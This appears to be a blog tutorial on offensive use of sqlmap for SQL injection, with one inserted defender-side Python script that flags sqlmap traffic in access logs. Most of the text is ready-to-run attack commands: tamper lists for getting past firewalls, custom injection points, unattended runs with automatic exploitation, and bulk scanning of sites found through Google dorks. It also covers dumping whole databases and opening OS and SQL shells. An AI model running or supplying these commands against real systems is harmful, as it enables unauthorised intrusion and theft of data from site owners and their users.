Advanced Sqlmap - Metasploit for SQL Injection.
[?] What is SQL Injection?
I'm not going to describe what SQL Injection is in this post; please check https://www.owasp.org/index.php/SQL_Injection
[?] Why we use sqlmap?
- It is an automatic SQL injection tool.
- It provides many advanced techniques that I'll show you in this post.
- Open source and highly scalable.
- Easy to install.
[*] Sqlmap source https://github.com/sqlmapproject/sqlmap
All you need is Python 2.x and an Internet connection:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
[*] Well, now I'm going to show you some advanced techniques.
[Bypass WAF using sqlmap tamper script]
python sqlmap.py -u 'http://example.com/product?id=1' -p 'id' --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode --timeout=25 --time-sec=25 --random-agent --dbs
You can also use more tamper scripts, but which ones depends on the victim's DBMS. (Using too many tamper scripts is NOT RECOMMENDED.)
Here are some tamper scripts for specific DBMSs:
- General Tamper testing:
tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
- MSSQL:
tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes
- MySQL:
tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
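Added here as a defender-side example (not code from the original post or from sqlmap): a small Python check that looks in web-server access logs for the traces the options above leave behind, namely the default sqlmap User-Agent when --random-agent is not used, the byte patterns of the apostrophemask, apostrophenullencode, space2comment and charencode tampers, and one parameter being hit with many distinct values as --level=5 --risk=3 does. The log lines, client IPs and the distinct-value threshold are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl
# Constructed combined-format access log lines (sample data, not taken from the original post).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /product?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2023:13:55:40 +0000] "GET /product?id=1%EF%BC%87 HTTP/1.1" 500 0 "-" "Mozilla/5.0 (X11; Linux)"
10.0.0.9 - - [10/Oct/2023:13:55:41 +0000] "GET /product?id=1%00%27 HTTP/1.1" 500 0 "-" "Mozilla/5.0 (X11; Linux)"
10.0.0.9 - - [10/Oct/2023:13:55:42 +0000] "GET /product?id=1%27/**/AND/**/1=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux)"
10.0.0.9 - - [10/Oct/2023:13:55:43 +0000] "GET /product?id=1%27%20%41%4E%44%20%53%4C%45%45%50%28%35%29 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux)"
10.0.0.7 - - [10/Oct/2023:13:56:01 +0000] "GET /product?id=2 HTTP/1.1" 200 512 "-" "sqlmap/1.7 (https://sqlmap.org)"
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# Byte patterns the tamper scripts listed above leave in the raw (still URL-encoded) request line.
TAMPER_SIGNATURES = {
    "apostrophemask": re.compile(r"%EF%BC%87", re.I),      # ' replaced by a fullwidth apostrophe
    "apostrophenullencode": re.compile(r"%00%27", re.I),   # ' replaced by %00%27
    "space2comment": re.compile(r"/\*\*/"),                # spaces replaced by /**/
    "charencode": re.compile(r"(?:%(?:4[1-9A-F]|5[0-9A]|6[1-9A-F]|7[0-9A])){4,}", re.I),  # runs of %-encoded letters
}

def classify(line):
    """Parse one log line into (ip, raw target, reasons); returns (None, None, []) if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None, None, []
    reasons = []
    if m.group("ua").lower().startswith("sqlmap/"):  # without --random-agent the User-Agent gives it away
        reasons.append("default sqlmap User-Agent")
    for name, pattern in TAMPER_SIGNATURES.items():
        if pattern.search(m.group("target")):
            reasons.append("tamper:" + name)
    return m.group("ip"), m.group("target"), reasons

def scan_log(text, distinct_threshold=3):
    """Per client IP: signature hits, plus any parameter probed with many distinct values (--level=5 --risk=3 traffic)."""
    findings = defaultdict(set)
    probes = defaultdict(set)  # (ip, path, param) -> distinct decoded values seen
    for line in text.splitlines():
        ip, target, reasons = classify(line)
        if ip is None:
            continue
        findings[ip].update(reasons)
        parts = urlsplit(target)
        for param, value in parse_qsl(parts.query, keep_blank_values=True):
            probes[(ip, parts.path, param)].add(value)
    for (ip, path, param), values in probes.items():
        if len(values) >= distinct_threshold:
            findings[ip].add(f"{len(values)} distinct values for {param} on {path}")
    return {ip: sorted(reasons) for ip, reasons in findings.items() if reasons}
```

Calling scan_log(SAMPLE_LOG) returns a dict of client IP to the reasons it was flagged; the benign client 10.0.0.5 does not appear in it.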
[Run sqlmap with custom position and POST request]
So what if your target URL is: http://example.com/post/123
How can we use the -p option in sqlmap? Just add a '*' to mark the position where you want sqlmap to inject its payload.
python sqlmap.py -u 'http://example.com/post/123*' --dbs
Or even a POST request like this:
POST /login.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded

user=admin&pass=supersecret
Save that POST request to a file, for example request.txt, and run:
python sqlmap.py -r request.txt -p 'user' --dbs
You can also place a '*' anywhere in request.txt and run sqlmap (for example, for cookie injection :D).
[Running sqlmap without interact]
Normally when you run sqlmap, you'll get some questions from sqlmap, like the one shown below.
This is useful but sometimes bothers you, so the command below will help you with that.
python sqlmap.py -u 'http://example.com/product?id=1' -p 'id' --batch
--batch: use the default behaviour, for example:
it is not recommended -- [snip] -- Do you want to skip? [Y/n]
In this case 'Y' is the default, and using the --batch option will skip that question and answer 'Y'.
python sqlmap.py -u 'http://example.com/product?id=1' -p 'id' --answers="extending=N,follow=N,keep=N,exploit=Y"
You can also use the --answers option to pre-answer some questions.
- extending: increase level and risk.
- follow: follow redirection.
- keep: whether to keep running if the connection times out.
- exploit: whether to exploit the target if it is exploitable.
[Running sqlmap with Google Dork]
Google dorks for SQL injection: https://www.exploit-db.com/google-hacking-database/14/
In this post I'm gonna use inurl:"article.php?id=" just for a demo.
python sqlmap.py -g 'inurl:"article.php?id="' --random-agent --batch --answers="extending=N,follow=N,keep=N,exploit=Y" --dbs --threads 5
You can even run sqlmap against a list of links from a Google Dork.
Save the list of links to a file, for example simple.txt, and use the command below:
python sqlmap.py -m simple.txt --random-agent --batch --answers="extending=N,follow=N,keep=N,exploit=Y" --threads 5 --dbs --output-dir="/tmp/data-sqli/"
-m: file containing the links to test.
--output-dir: custom location for sqlmap's session output (default is '.sqlmap/output/')
So what if we crawl all the links from the Google Dork and run sqlmap on them (using Burp Suite or a custom Python script)?
I already created a python script to do that shit :D.
[Running sqlmap with Burp Suite]
You need to install the SQLiPy extension in Burp; check it out on the official Burp Suite site:
https://support.portswigger.net/customer/en/portal/articles/2791040-using-burp-with-sqlmap
Run the sqlmapapi server:
python sqlmapapi.py -s -H <IP> -p <Port>
For instance:
python sqlmapapi.py -s -H 127.0.0.1 -p 8775
Send a request to SQLiPy and you're good to go.
[Some techniques to dump data from a vulnerable target]
Enumerate DBMS databases:
python sqlmap.py -u 'http://example.com/product?id=1' -p 'id' --dbs
Dump all entries of all DBMS databases' tables:
python sqlmap.py -u 'http://example.com/product?id=1' -p 'id' --dump-all
Enumerate DBMS database tables:
python sqlmap.py -u 'http://example.com/product?id=1' -p 'id' -D somedb --tables
Dump data from a specific database or table:
python sqlmap.py -u 'http://example.com/product?id=1' -p 'id' -D somedb -T sometable --dump
[Some other advanced techniques]
Show advanced help:
python sqlmap.py -hh
Specific DBMS:
--dbms: specify the DBMS to save time (e.g. --dbms=mysql)
Reverse shell with sqlmap:
--os-shell: reverse shell by uploading a UDF (does not work in all cases)
Custom sql query:
--sql-shell: Prompt for an interactive SQL shell (basically you can run any sql query)